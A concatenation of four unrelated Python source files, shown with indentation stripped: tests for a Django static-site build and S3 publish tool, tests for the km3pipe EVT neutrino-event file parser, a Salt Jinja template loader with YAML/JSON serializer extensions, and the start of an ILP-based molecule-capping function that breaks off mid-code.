def setUp(self):
self.factory = RequestFactory()
for m in [MockObject, AutoMockObject]:
m.objects.create(name=1)
m.objects.create(name=2)
m.objects.create(name=3)
def test_models(self):
for m in [MockObject, AutoMockObject]:
obj = m.objects.all()[0]
obj.build()
obj.unbuild()
obj.get_absolute_url()
def test_template_view(self):
v = views.BuildableTemplateView(
template_name='templateview.html',
build_path='foo.html',
)
v.build_method
v.build()
build_path = os.path.join(settings.BUILD_DIR, 'foo.html')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
v = views.BuildableTemplateView(
template_name='templateview.html',
build_path='foo/bar.html',
)
v.build_method
v.build()
build_path = os.path.join(settings.BUILD_DIR, 'foo', 'bar.html')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
def test_list_view(self):
v = views.BuildableListView(
queryset=[1, 2, 3],
template_name='listview.html',
build_path='foo.html',
)
v.build_method
v.build_queryset()
build_path = os.path.join(settings.BUILD_DIR, 'foo.html')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
v = views.BuildableListView(
queryset=[1, 2, 3],
template_name='listview.html',
build_path='foo/bar.html',
)
v.build_method
v.build_queryset()
build_path = os.path.join(settings.BUILD_DIR, 'foo', 'bar.html')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
def test_detail_view(self):
v = views.BuildableDetailView(
queryset=MockObject.objects.all(),
template_name='detailview.html',
)
v.build_method
v.build_queryset()
for o in MockObject.objects.all():
build_path = os.path.join(
settings.BUILD_DIR,
o.get_absolute_url()[1:],
'index.html',
)
self.assertTrue(os.path.exists(build_path))
v.unbuild_object(o)
def test_redirect_view(self):
v = views.BuildableRedirectView(
build_path="detail/badurl.html",
url="/detail/"
)
v.build_method
v.build()
MockRedirectView().build()
build_path = os.path.join(
settings.BUILD_DIR,
"detail/badurl.html"
)
self.assertTrue(os.path.exists(build_path))
def test_404_view(self):
v = views.Buildable404View()
v.build_method
v.build()
build_path = os.path.join(settings.BUILD_DIR, '404.html')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
def test_json_view(self):
v = MockJSONView()
v.build()
build_path = os.path.join(settings.BUILD_DIR, 'jsonview.json')
self.assertTrue(os.path.exists(build_path))
self.assertEqual(
json.loads(open(build_path, 'rb').read().decode()),
{"hello": "tests"}
)
os.remove(build_path)
def test_rss_feed(self):
f = MockRSSFeed()
f.build_method
f.build_queryset()
build_path = os.path.join(settings.BUILD_DIR, 'feed.xml')
self.assertTrue(os.path.exists(build_path))
os.remove(build_path)
def test_build_cmd(self):
call_command("build", **{'skip_media': True, 'verbosity': 3})
call_command("build", **{'skip_static': True, 'verbosity': 3})
call_command("build", **{'skip_static': True, 'skip_media': True})
call_command("build", **{
'skip_static': True,
'skip_media': True,
'verbosity': 3,
})
call_command("build", **{
'skip_static': True,
'skip_media': True,
'build_dir': settings.BUILD_DIR,
})
call_command("build", 'bakery.tests.MockDetailView')
foobar_path = os.path.join(
settings.BUILD_DIR,
'static',
'foo.bar'
)
self.assertTrue(os.path.exists(foobar_path))
self.assertEqual(
open(foobar_path, 'rb').read().strip(),
six.b('Hello tests')
)
robots_path = os.path.join(settings.BUILD_DIR, 'robots.txt')
self.assertTrue(os.path.exists(robots_path))
favicon_path = os.path.join(settings.BUILD_DIR, 'favicon.ico')
self.assertTrue(os.path.exists(favicon_path))
# If the view you attempt to build does not exist,
# the build command should throw a CommandError.
self.assertRaises(
CommandError,
call_command,
'build',
'FooView',
)
def test_unbuild_cmd(self):
call_command("unbuild")
def test_gzipped(self):
with self.settings(BAKERY_GZIP=True):
six.print_("testing gzipped files")
self.test_models()
self.test_template_view()
self.test_list_view()
self.test_detail_view()
self.test_404_view()
self.test_build_cmd()
def test_buildserver_cmd(self):
pass
def test_publish_cmd(self):
if not sys.version_info[:2] == (3, 4):
from moto import mock_s3
with mock_s3():
conn = boto.connect_s3()
bucket = conn.create_bucket(settings.AWS_BUCKET_NAME)
call_command("build")
call_command("publish", no_pooling=True, verbosity=3)
local_file_list = []
for (dirpath, dirnames, filenames) in os.walk(
settings.BUILD_DIR):
for fname in filenames:
local_key = os.path.join(
os.path.relpath(dirpath, settings.BUILD_DIR),
fname
)
if local_key.startswith('./'):
local_key = local_key[2:]
local_file_list.append(local_key)
for key in bucket.list():
self.assertIn(key.name, local_file_list)
call_command("unbuild")
os.makedirs(settings.BUILD_DIR)
call_command("publish", no_pooling=True, verbosity=3)
else:
self.skipTest("Moto doesn't work in Python 3.4")
def test_unpublish_cmd(self):
if not sys.version_info[:2] == (3, 4):
from moto import mock_s3
with mock_s3():
conn = boto.connect_s3()
bucket = conn.create_bucket(settings.AWS_BUCKET_NAME)
call_command("build")
call_command("unpublish", no_pooling=True, verbosity=3)
self.assertFalse(list(key for key in bucket.list()))
else:
self.skipTest("Moto doesn't work in Python 3.4")
def test_tasks(self):
from bakery import tasks
obj = AutoMockObject.objects.all()[0]
ct = ContentType.objects.get_for_model(obj)
tasks.publish_object(ct.id, obj.id)
tasks.unpublish_object(ct.id, obj.id)
# Some save overrides tests
obj = AutoMockObject.objects.all()[0]
obj.save(publish=False)
# obj.is_published = True
# obj.save()
obj.delete(unpublish=False)
def test_static_views(self):
static_views.serve(
self.factory.get("/static/robots.txt"),
'robots.txt',
document_root=os.path.join(os.path.dirname(__file__), 'static')
)
def test_cache_control(self):
if not sys.version_info[:2] == (3, 4):
from moto import mock_s3
with mock_s3():
# Set random max-age for various content types
with self.settings(BAKERY_CACHE_CONTROL={
"application/javascript": random.randint(0, 100000),
"text/css": random.randint(0, 100000),
"text/html": random.randint(0, 100000),
}):
conn = boto.connect_s3()
bucket = conn.create_bucket(settings.AWS_BUCKET_NAME)
call_command("build")
call_command("publish", no_pooling=True, verbosity=3)
for key in bucket:
key = bucket.get_key(key.name)
if key.content_type in settings.BAKERY_CACHE_CONTROL:
# key.cache_control returns string
# with "max-age=" prefix
self.assertIn(
str(settings.BAKERY_CACHE_CONTROL.get(
key.content_type)),
key.cache_control
)
else:
self.skipTest("Moto doesn't work in Python 3.4")
def test_batch_unpublish(self):
if not sys.version_info[:2] == (3, 4):
from moto import mock_s3
with mock_s3():
conn = boto.connect_s3()
bucket = conn.create_bucket(settings.AWS_BUCKET_NAME)
keys = []
for i in range(0, 10000):
k = boto.s3.key.Key(bucket)
k.key = i
k.set_contents_from_string('This is test object %s' % i)
keys.append(k)
call_command("unpublish", no_pooling=True, verbosity=3)
self.assertFalse(list(key for key in bucket.list()))
else:
self.skipTest("Moto doesn't work in Python 3.4")
| |
# Filename: test_evt.py
# pylint: disable=locally-disabled,C0111,R0904,C0301,C0103,W0212
from io import StringIO
from os.path import join, dirname
import numpy as np
from km3pipe.testing import TestCase, skip, data_path
from km3pipe.io.evt import EvtPump, EVT_PARSERS
__author__ = "Tamas Gal"
__copyright__ = "Copyright 2016, Tamas Gal and the KM3NeT collaboration."
__credits__ = []
__license__ = "MIT"
__maintainer__ = "Tamas Gal"
__email__ = "tgal@km3net.de"
__status__ = "Development"
class TestEvtPump(TestCase):
def setUp(self):
self.valid_evt_header = "\n".join(
(
"start_run: 1",
"cut_nu: 0.100E+03 0.100E+09-0.100E+01 0.100E+01",
"spectrum: -1.40",
"physics: gSeaGen 4.1 180126 165142",
"physics: GENIE 2.10.2 180126 165142",
"end_event:",
"start_event: 12 1",
"track_in: 1 -389.951 213.427 516 -0.204562 -0.60399 -0.770293"
+ " 9.092 0 5 40.998",
"hit: 1 44675 1 1170.59 5 2 1 1170.59",
"end_event:",
"start_event: 13 1",
"track_in: 1 272.695 -105.613 516 -0.425451 -0.370522 -0.825654"
+ " 2431.47 0 5 -1380",
"track_in: 2 272.348 -106.292 516 -0.425451 -0.370522 -0.825654"
+ " 24670.7 1.33 5 -1484",
"track_in: 3 279.47 -134.999 516 -0.425451 -0.370522 -0.825654"
+ " 164.586 26.7 5 601.939",
"hit: 1 20140 1 1140.06 5 1 1 1140.06",
"hit: 2 20159 1 1177.14 5 1 1 1177.14",
"hit: 3 20164 1 1178.19 5 1 1 1178.19",
"hit: 4 20170 1 1177.23 5 1 1 1177.23",
"hit: 5 20171 2 1177.25 5 1 2 1177.25",
"end_event:",
"start_event: 14 1",
"track_in: 1 40.256 -639.888 516 0.185998 0.476123 -0.859483"
+ " 10016.1 0 5 -1668",
"hit: 1 33788 1 2202.81 5 1 1 2202.81",
"hit: 2 33801 1 2248.95 5 1 1 2248.95",
"hit: 3 33814 1 2249.2 5 1 1 2249.2",
"end_event:",
)
)
self.no_evt_header = "\n".join(
(
"start_event: 12 1",
"track_in: 1 -389.951 213.427 516 -0.204562 -0.60399 -0.770293"
+ " 9.092 0 5 40.998",
"hit: 1 44675 1 1170.59 5 2 1 1170.59",
"end_event:",
"start_event: 13 1",
"track_in: 1 272.695 -105.613 516 -0.425451 -0.370522 -0.825654"
+ " 2431.47 0 5 -1380",
"track_in: 2 272.348 -106.292 516 -0.425451 -0.370522 -0.825654"
+ " 24670.7 1.33 5 -1484",
"track_in: 3 279.47 -134.999 516 -0.425451 -0.370522 -0.825654"
+ " 164.586 26.7 5 601.939",
"hit: 1 20140 1 1140.06 5 1 1 1140.06",
"hit: 2 20159 1 1177.14 5 1 1 1177.14",
"hit: 3 20164 1 1178.19 5 1 1 1178.19",
"hit: 4 20170 1 1177.23 5 1 1 1177.23",
"hit: 5 20171 2 1177.25 5 1 2 1177.25",
"end_event:",
"start_event: 14 1",
"track_in: 1 40.256 -639.888 516 0.185998 0.476123 -0.859483"
+ " 10016.1 0 5 -1668",
"hit: 1 33788 1 2202.81 5 1 1 2202.81",
"hit: 2 33801 1 2248.95 5 1 1 2248.95",
"hit: 3 33814 1 2249.2 5 1 1 2249.2",
"end_event:",
)
)
self.corrupt_evt_header = "foo"
self.corrupt_line = "\n".join(
("start_event: 1 1", "corrupt line", "end_event:")
)
self.pump = EvtPump(parsers=[])
self.pump.blob_file = StringIO(self.valid_evt_header)
def tearDown(self):
self.pump.blob_file.close()
def test_parse_header(self):
raw_header = self.pump.extract_header()
self.assertEqual([["1"]], raw_header["start_run"])
self.assertAlmostEqual(-1.4, float(raw_header["spectrum"][0][0]))
self.assertAlmostEqual(1, float(raw_header["cut_nu"][0][2]))
def test_header_entries_with_same_tag_are_put_in_lists(self):
raw_header = self.pump.extract_header()
self.assertAlmostEqual(2, len(raw_header["physics"]))
self.assertAlmostEqual(1, len(raw_header["spectrum"]))
assert "gSeaGen" == raw_header["physics"][0][0]
assert "GENIE" == raw_header["physics"][1][0]
# def test_incomplete_header_raises_value_error(self):
# temp_file = StringIO(self.corrupt_evt_header)
# pump = EvtPump()
# pump.blob_file = temp_file
# with self.assertRaises(ValueError):
# pump.extract_header()
# temp_file.close()
def test_record_offset_saves_correct_offset(self):
self.pump.blob_file = StringIO("a" * 42)
offsets = [1, 4, 9, 12, 23]
for offset in offsets:
self.pump.blob_file.seek(0, 0)
self.pump.blob_file.seek(offset, 0)
self.pump._record_offset()
self.assertListEqual(offsets, self.pump.event_offsets)
def test_event_offset_is_at_first_event_after_parsing_header(self):
self.pump.extract_header()
self.assertEqual(161, self.pump.event_offsets[0])
def test_rebuild_offsets(self):
self.pump.extract_header()
self.pump._cache_offsets()
self.assertListEqual([161, 306, 773], self.pump.event_offsets)
def test_rebuild_offsets_without_header(self):
self.pump.blob_file = StringIO(self.no_evt_header)
self.pump.extract_header()
self.pump._cache_offsets()
self.assertListEqual([0, 145, 612], self.pump.event_offsets)
def test_cache_enabled_triggers_rebuild_offsets(self):
self.pump.cache_enabled = True
self.pump.prepare_blobs()
self.assertEqual(3, len(self.pump.event_offsets))
def test_cache_disabled_doesnt_trigger_cache_offsets(self):
self.pump.cache_enabled = False
self.pump.prepare_blobs()
self.assertEqual(1, len(self.pump.event_offsets))
def test_get_blob_triggers_cache_offsets_if_cache_disabled(self):
"...and asking for not indexed event"
self.pump.cache_enabled = False
self.pump.prepare_blobs()
self.assertEqual(1, len(self.pump.event_offsets))
blob = self.pump.get_blob(2)
self.assertTupleEqual((14, 1), blob["start_event"])
self.assertEqual(3, len(self.pump.event_offsets))
def test_get_blob_raises_index_error_for_wrong_index(self):
self.pump.prepare_blobs()
with self.assertRaises(IndexError):
self.pump.get_blob(23)
def test_get_blob_returns_correct_event_information(self):
self.pump.prepare_blobs()
blob = self.pump.get_blob(0)
self.assertTrue("raw_header" in blob)
self.assertEqual([["1"]], blob["raw_header"]["start_run"])
self.assertTupleEqual((12, 1), blob["start_event"])
# TODO: all the other stuff like hit, track etc.
assert "hit" in blob
assert "track_in" in blob
assert np.allclose(
[[1.0, 44675.0, 1.0, 1170.59, 5.0, 2.0, 1.0, 1170.59]], blob["hit"]
)
blob = self.pump.get_blob(1)
assert 5 == len(blob["hit"])
assert np.allclose(
[3.0, 20164.0, 1.0, 1178.19, 5.0, 1.0, 1.0, 1178.19], blob["hit"][2]
)
def test_get_blob_returns_correct_events(self):
self.pump.prepare_blobs()
blob = self.pump.get_blob(0)
self.assertTupleEqual((12, 1), blob["start_event"])
blob = self.pump.get_blob(2)
self.assertTupleEqual((14, 1), blob["start_event"])
blob = self.pump.get_blob(1)
self.assertTupleEqual((13, 1), blob["start_event"])
def test_process_returns_correct_blobs(self):
self.pump.prepare_blobs()
blob = self.pump.process()
self.assertTupleEqual((12, 1), blob["start_event"])
blob = self.pump.process()
self.assertTupleEqual((13, 1), blob["start_event"])
blob = self.pump.process()
self.assertTupleEqual((14, 1), blob["start_event"])
def test_process_raises_stop_iteration_if_eof_reached(self):
self.pump.prepare_blobs()
self.pump.process()
self.pump.process()
self.pump.process()
with self.assertRaises(StopIteration):
self.pump.process()
def test_pump_acts_as_iterator(self):
self.pump.prepare_blobs()
event_numbers = []
for blob in self.pump:
event_numbers.append(blob["start_event"][0])
self.assertListEqual([12, 13, 14], event_numbers)
def test_pump_has_len(self):
self.pump.prepare_blobs()
self.assertEqual(3, len(self.pump))
def test_pump_get_item_returns_first_for_index_zero(self):
self.pump.prepare_blobs()
first_blob = self.pump[0]
self.assertEqual(12, first_blob["start_event"][0])
def test_pump_get_item_returns_correct_blob_for_index(self):
self.pump.prepare_blobs()
blob = self.pump[1]
self.assertEqual(13, blob["start_event"][0])
def test_pump_slice_generator(self):
self.pump.prepare_blobs()
blobs = self.pump[:]
blobs = list(self.pump[1:3])
self.assertEqual(2, len(blobs))
self.assertEqual((13, 1), blobs[0]["start_event"])
def test_create_blob_entry_for_line_ignores_corrupt_line(self):
self.pump.blob_file = StringIO(self.corrupt_line)
self.pump.extract_header()
self.pump.prepare_blobs()
self.pump.get_blob(0)
def test_parsers_are_ignored_if_not_valid(self):
self.pump = EvtPump(parsers=["a", "b"])
self.pump.blob_file = StringIO(self.valid_evt_header)
assert "a" not in self.pump.parsers
assert "b" not in self.pump.parsers
def test_parsers_are_added(self):
self.pump = EvtPump(parsers=["km3sim"])
self.pump.blob_file = StringIO(self.valid_evt_header)
assert EVT_PARSERS["km3sim"] in self.pump.parsers
def test_custom_parser(self):
def a_parser(blob):
blob["foo"] = 23
self.pump = EvtPump(parsers=[a_parser])
self.pump.blob_file = StringIO(self.valid_evt_header)
self.pump.extract_header()
self.pump.prepare_blobs()
blob = self.pump[0]
assert 23 == blob["foo"]
def test_auto_parser_finds_all_physics_parsers(self):
self.pump = EvtPump(parsers="auto")
self.pump.blob_file = StringIO(self.valid_evt_header)
self.pump.extract_header()
assert EVT_PARSERS["gseagen"] in self.pump.parsers
class TestEvtFilePump(TestCase):
def setUp(self):
self.fname = data_path("evt/example_numuNC.evt")
def test_pipe(self):
pump = EvtPump(filename=self.fname)
next(pump)
pump.finish()
class TestCorsika(TestCase):
def setUp(self):
self.fname = data_path("evt/example_corant_propa.evt")
def test_pipe(self):
pump = EvtPump(filename=self.fname)
next(pump)
pump.finish()
class TestPropa(TestCase):
def setUp(self):
self.fname = data_path("evt/example_corant_propa.evt")
self.fnames = []
for i in [0, 1]:
self.fnames.append(data_path("evt/example_corant_propa.evt"))
def test_pipe(self):
pump = EvtPump(filename=self.fname, parsers=["propa"])
assert EVT_PARSERS["propa"] in pump.parsers
blob = next(pump)
assert "start_event" in blob
assert "track_primary" in blob
assert "track_in" in blob
pump.finish()
def test_filenames(self):
pump = EvtPump(filenames=self.fnames, parsers=["propa"])
assert EVT_PARSERS["propa"] in pump.parsers
blob = next(pump)
assert "start_event" in blob
assert "track_primary" in blob
assert "track_in" in blob
pump.finish()
@skip
def test_auto_parser(self):
pump = EvtPump(filename=self.fname)
assert EVT_PARSERS["propa"] in pump.parsers
blob = next(pump)
assert "start_event" in blob
assert "track_primary" in blob
assert "Muon" in blob
assert "MuonMultiplicity" in blob
assert "Neutrino" in blob
assert "NeutrinoMultiplicity" in blob
assert "Weights" in blob
assert "Primary" in blob
pump.finish()
class TestKM3Sim(TestCase):
def setUp(self):
self.fname = data_path("evt/KM3Sim.evt")
def test_pipe(self):
pump = EvtPump(filename=self.fname, parsers=["km3sim"])
assert EVT_PARSERS["km3sim"] in pump.parsers
next(pump)
pump.finish()
def test_hits(self):
pump = EvtPump(filename=self.fname, parsers=["km3sim"])
blob = pump[0]
hits = blob["KM3SimHits"]
assert 4 == len(hits)
assert 195749 == hits[0].pmt_id
def test_neutrino(self):
pump = EvtPump(filename=self.fname, parsers=["gseagen", "km3sim"])
blob = pump[0]
EVT_PARSERS["gseagen"](blob)
neutrino = blob["Neutrinos"][0]
self.assertAlmostEqual(0.10066, neutrino.energy)
class TestParserDetection(TestCase):
def test_parsers_are_automatically_detected(self):
pass
| |
# -*- coding: utf-8 -*-
'''
Jinja loading utils to enable a more powerful backend for jinja templates
'''
# Import python libs
from os import path
import logging
import json
import pprint
from functools import wraps
# Import third party libs
from jinja2 import BaseLoader, Markup, TemplateNotFound, nodes
from jinja2.environment import TemplateModule
from jinja2.ext import Extension
from jinja2.exceptions import TemplateRuntimeError
import yaml
# Import salt libs
import salt
import salt.fileclient
from salt.utils.odict import OrderedDict
from salt._compat import string_types
log = logging.getLogger(__name__)
__all__ = [
'SaltCacheLoader',
'SerializerExtension'
]
# To dump OrderedDict objects as regular dicts. Used by the yaml
# template filter.
class OrderedDictDumper(yaml.Dumper):
pass
yaml.add_representer(OrderedDict,
yaml.representer.SafeRepresenter.represent_dict,
Dumper=OrderedDictDumper)
class SaltCacheLoader(BaseLoader):
'''
A special jinja Template Loader for salt.
Requested templates are always fetched from the server
to guarantee that the file is up to date.
Templates are cached like regular salt states
and only loaded once per loader instance.
'''
def __init__(self, opts, env='base', encoding='utf-8'):
self.opts = opts
self.env = env
self.encoding = encoding
if opts.get('file_client', 'remote') == 'local':
self.searchpath = opts['file_roots'][env]
else:
self.searchpath = [path.join(opts['cachedir'], 'files', env)]
log.debug('Jinja search path: \'{0}\''.format(self.searchpath))
self._file_client = None
self.cached = []
def file_client(self):
'''
Return a file client. Instantiates on first call.
'''
if not self._file_client:
self._file_client = salt.fileclient.get_file_client(self.opts)
return self._file_client
def cache_file(self, template):
'''
Cache a file from the salt master
'''
saltpath = path.join('salt://', template)
self.file_client().get_file(saltpath, '', True, self.env)
def check_cache(self, template):
'''
Cache a file only once
'''
if template not in self.cached:
self.cache_file(template)
self.cached.append(template)
def get_source(self, environment, template):
# checks for relative '..' paths
if '..' in template:
log.warning(
'Discarded template path \'{0}\', relative paths are '
'prohibited'.format(template)
)
raise TemplateNotFound(template)
self.check_cache(template)
for spath in self.searchpath:
filepath = path.join(spath, template)
try:
with salt.utils.fopen(filepath, 'rb') as ifile:
contents = ifile.read().decode(self.encoding)
mtime = path.getmtime(filepath)
def uptodate():
try:
return path.getmtime(filepath) == mtime
except OSError:
return False
return contents, filepath, uptodate
except IOError:
# there is no file under current path
continue
# there is no template file within searchpaths
raise TemplateNotFound(template)
class PrintableDict(OrderedDict):
'''
Ensures that dict str() and repr() are YAML friendly.
.. code-block:: python
mapping = OrderedDict([('a', 'b'), ('c', None)])
print mapping
# OrderedDict([('a', 'b'), ('c', None)])
decorated = PrintableDict(mapping)
print decorated
# {'a': 'b', 'c': None}
'''
def __str__(self):
output = []
for key, value in self.items():
if isinstance(value, string_types):
# keeps quotes around strings
output.append('{0!r}: {1!r}'.format(key, value))
else:
# let default output
output.append('{0!r}: {1!s}'.format(key, value))
return '{' + ', '.join(output) + '}'
def __repr__(self): # pylint: disable=W0221
output = []
for key, value in self.items():
output.append('{0!r}: {1!r}'.format(key, value))
return '{' + ', '.join(output) + '}'
class SerializerExtension(Extension, object):
'''
Yaml and Json manipulation.
Format filters
~~~~~~~~~~~~~~
Allows to jsonify or yamlify any datastructure. For example, this dataset:
.. code-block:: python
data = {
'foo': True,
'bar': 42,
'baz': [1, 2, 3],
'qux': 2.0
}
.. code-block:: jinja
yaml = {{ data|yaml }}
json = {{ data|json }}
python = {{ data|python }}
will be rendered has::
yaml = {bar: 42, baz: [1, 2, 3], foo: true, qux: 2.0}
json = {"baz": [1, 2, 3], "foo": true, "bar": 42, "qux": 2.0}
python = {'bar': 42, 'baz': [1, 2, 3], 'foo': True, 'qux': 2.0}
Load filters
~~~~~~~~~~~~
Parse strings variable with the selected serializer:
.. code-block:: jinja
{%- set yaml_src = "{foo: it works}"|load_yaml %}
{%- set json_src = "{'bar': 'for real'}"|load_yaml %}
Dude, {{ yaml_src.foo }} {{ json_src.bar }}!
will be rendered has::
Dude, it works for real!
Load tags
~~~~~~~~~
Like the load filters, it parses blocks with the selected serializer,
and assign it to the relevant variable
Syntaxe are {% load_yaml as [VARIABLE] %}[YOUR DATA]{% endload %}
and {% load_json as [VARIABLE] %}[YOUR DATA]{% endload %}
For example:
.. code-block:: jinja
{% load_yaml as yaml_src %}
foo: it works
{% endload %}
{% load_json as json_src %}
{
"bar": "for real"
}
{% endload %}
Dude, {{ yaml_src.foo }} {{ json_src.bar }}!
will be rendered has::
Dude, it works for real!
Import tags
~~~~~~~~~~~
You can also import template and decode them automatically.
Syntaxe are {% import_yaml [TEMPLATE_NAME] as [VARIABLE] %}
and {% import_json [TEMPLATE_NAME] as [VARIABLE] %}
.. code-block:: jinja
{% import_yaml "state2.sls" as state2 %}
{% import_json "state3.sls" as state3 %}
Catalog
~~~~~~~
``import_*`` and ``load_*`` tags will automatically expose their
target variable to import. This feature makes catalog of data to
handle.
for example:
.. code-block:: jinja
# doc1.sls
{% load_yaml as var1 %}
foo: it works
{% endload %}
{% load_yaml as var2 %}
bar: for real
{% endload %}
.. code-block:: jinja
# doc2.sls
{% from "doc1.sls" import var1, var2 as local2 %}
{{ var1.foo }} {{ local2.bar }}
'''
tags = set(['load_yaml', 'load_json', 'import_yaml', 'import_json'])
def __init__(self, environment):
super(SerializerExtension, self).__init__(environment)
self.environment.filters.update({
'yaml': self.format_yaml,
'json': self.format_json,
'python': self.format_python,
'load_yaml': self.load_yaml,
'load_json': self.load_json
})
if self.environment.finalize is None:
self.environment.finalize = self.finalizer
else:
finalizer = self.environment.finalize
@wraps(finalizer)
def wrapper(self, data):
return finalizer(self.finalizer(data))
self.environment.finalize = wrapper
def finalizer(self, data):
'''
Ensure that printed mappings are YAML friendly.
'''
def explore(data):
if isinstance(data, (dict, OrderedDict)):
return PrintableDict([(key, explore(value)) for key, value in data.items()])
elif isinstance(data, (list, tuple, set)):
return data.__class__([explore(value) for value in data])
return data
return explore(data)
def format_json(self, value):
return Markup(json.dumps(value, sort_keys=True).strip())
def format_yaml(self, value):
return Markup(yaml.dump(value, default_flow_style=True,
Dumper=OrderedDictDumper).strip())
def format_python(self, value):
return Markup(pprint.pformat(value).strip())
def load_yaml(self, value):
if isinstance(value, TemplateModule):
value = str(value)
try:
return yaml.load(value)
except AttributeError:
raise TemplateRuntimeError(
'Unable to load yaml from {0}'.format(value))
def load_json(self, value):
if isinstance(value, TemplateModule):
value = str(value)
try:
return json.loads(value)
except (ValueError, TypeError, AttributeError):
raise TemplateRuntimeError(
'Unable to load json from {0}'.format(value))
def parse(self, parser):
if parser.stream.current.value == 'import_yaml':
return self.parse_yaml(parser)
elif parser.stream.current.value == 'import_json':
return self.parse_json(parser)
elif parser.stream.current.value in ('load_yaml', 'load_json'):
return self.parse_load(parser)
parser.fail('Unknown format ' + parser.stream.current.value,
parser.stream.current.lineno)
def parse_load(self, parser):
filter_name = parser.stream.current.value
lineno = next(parser.stream).lineno
if filter_name not in self.environment.filters:
parser.fail('Unable to parse {0}'.format(filter_name), lineno)
parser.stream.expect('name:as')
target = parser.parse_assign_target()
macro_name = '_' + parser.free_identifier().name
macro_body = parser.parse_statements(('name:endload',),
drop_needle=True)
return [
nodes.Macro(
macro_name,
[],
[],
macro_body
).set_lineno(lineno),
nodes.Assign(
target,
nodes.Filter(
nodes.Call(
nodes.Name(macro_name, 'load').set_lineno(lineno),
[],
[],
None,
None
).set_lineno(lineno),
filter_name,
[],
[],
None,
None
).set_lineno(lineno)
).set_lineno(lineno)
]
def parse_yaml(self, parser):
import_node = parser.parse_import()
target = import_node.target
lineno = import_node.lineno
return [
import_node,
nodes.Assign(
nodes.Name(target, 'store').set_lineno(lineno),
nodes.Filter(
nodes.Name(target, 'load').set_lineno(lineno),
'load_yaml',
[],
[],
None,
None
)
.set_lineno(lineno)
).set_lineno(lineno)
]
def parse_json(self, parser):
import_node = parser.parse_import()
target = import_node.target
lineno = import_node.lineno
return [
import_node,
nodes.Assign(
nodes.Name(target, 'store').set_lineno(lineno),
nodes.Filter(
nodes.Name(target, 'load').set_lineno(lineno),
'load_json',
[],
[],
None,
None
)
.set_lineno(lineno)
).set_lineno(lineno)
]
| |
from typing import Optional, TextIO, Dict, Any, List
from sys import stdout
from fragment_capping.config import ILP_SOLVER_TIMEOUT
from fragment_capping.helpers.types_helpers import Atom, MIN, MAX
from fragment_capping.helpers.parameters import MAX_ABSOLUTE_CHARGE, MIN_ABSOLUTE_CHARGE, MAX_NONBONDED_ELECTRONS, MAX_BOND_ORDER, MIN_BOND_ORDER, VALENCE_ELECTRONS, ELECTRONS_PER_BOND, MUST_BE_INT, ALL_CAPPING_OPTIONS, ELECTRONEGATIVITIES, Capping_Strategy, NO_CAP, new_atom_for_capping_strategy, max_valence_for, min_valence_for
from fragment_capping.helpers.misc import write_to_debug
from fragment_capping.helpers.exceptions import Too_Many_Permutations, Not_Capped_Error
from fragment_capping.helpers.iterables import MAXIMUM_PERMUTATION_NUMBER
def get_best_capped_molecule_with_ILP(
molecule: 'Molecule',
net_charge: Optional[int] = None,
number_hydrogens: Optional[int] = None,
enforce_octet_rule: bool = True,
allow_radicals: bool = False,
debug: Optional[TextIO] = None,
) -> 'Molecule':
'''
Use an ILP to cap (complete the valence) of an uncapped molecule using a library a capping fragments.
Args:
``molecule``: Molecule to be capped. Some of its atoms should have the ``capped`` attribute set to False.
``net_charge``: (Optional) Constraint the total net charge for the capped molecule.
``number_hydrogens``: (Optional) Constraint the total number of hydrogens for the capped molecule (including hydrogens already present in the molecule).
``enforce_octet_rule``: (Optional) Constraint organic elements (H, C, N, O) to satisfy the octet rule.
``allow_radicals``: (Optional) Allow unpaired non-bonded electrons.
``debug``: (Optional) Print very detailed debugging information
Returns:
The modified, capped ``molecule``.
'''
neighbour_counts = molecule.neighbours_for_atoms()
def keep_capping_strategy_for_atom(capping_strategy: Capping_Strategy, atom: Atom) -> bool:
if atom.valence is not None:
if False:
if neighbour_counts[atom.index] + new_atom_for_capping_strategy(capping_strategy) == atom.valence:
print(atom, capping_strategy)
return neighbour_counts[atom.index] + new_atom_for_capping_strategy(capping_strategy) == atom.valence
else:
return min_valence_for(atom) <= neighbour_counts[atom.index] + new_atom_for_capping_strategy(capping_strategy) <= max_valence_for(atom)
def possible_capping_strategies_for_atom(atom: Atom) -> List[Capping_Strategy]:
if debug is not None:
write_to_debug(debug, '')
write_to_debug(debug, atom)
write_to_debug(debug, 'capping_strategy, new_atom_for_capping_strategy(), keep_capping_strategy_for_atom()')
for capping_strategy in ALL_CAPPING_OPTIONS[molecule.atom_desc(atom)]:
write_to_debug(
debug,
capping_strategy,
new_atom_for_capping_strategy(capping_strategy),
keep_capping_strategy_for_atom(capping_strategy, atom)
)
return [
capping_strategy
for capping_strategy in ALL_CAPPING_OPTIONS[molecule.atom_desc(atom)]
if keep_capping_strategy_for_atom(capping_strategy, atom)
]
atoms_need_capping = [atom for atom in molecule.sorted_atoms() if not atom.capped]
assert len(atoms_need_capping) > 0, 'Error: There are no uncapped atoms in the molecule.'
if False:
capping_schemes = list(
product(
*[
possible_capping_strategies_for_atom(atom)
for atom in atoms_need_capping
]
),
)
assert len(capping_schemes) > 0, [
(
atom,
possible_capping_strategies_for_atom(atom),
)
for atom in atoms_need_capping
if len(possible_capping_strategies_for_atom(atom)) == 0
]
write_to_debug(
debug,
[
possible_capping_strategies_for_atom(atom)
for atom in atoms_need_capping
],
)
from pulp import LpProblem, LpMinimize, LpInteger, LpVariable, LpBinary, LpStatus, lpSum
problem = LpProblem("Capping problem for molecule {0}".format(molecule.name), LpMinimize)
ELECTRON_MULTIPLIER = (2 if not allow_radicals else 1)
hydrogens_before_capping = len([1 for atom in molecule.atoms.values() if atom.element == 'H'])
counter_charges = {}
fragment_switches, fragment_scores, fragment_H_scores = {}, {}, {}
capping_atoms_for = {}
new_bonds_sets = {}
for uncapped_atom in atoms_need_capping:
possible_capping_strategies = possible_capping_strategies_for_atom(uncapped_atom)
if len(possible_capping_strategies) == 0 or len(possible_capping_strategies) == 1 and possible_capping_strategies[0] == NO_CAP:
pass
stdout.write('\nWarning: No capping strategy for atom: {0}. The ILP will be infeasible if a suitable cap is not available.'.format(uncapped_atom))
else:
for (i, capping_strategy) in enumerate(sorted(possible_capping_strategies), start=1):
write_to_debug(debug, uncapped_atom, capping_strategy, i)
# Add switch variable
fragment_switches[uncapped_atom.index, i] = LpVariable(
'F_{i},{j}'.format(i=uncapped_atom.index, j=i),
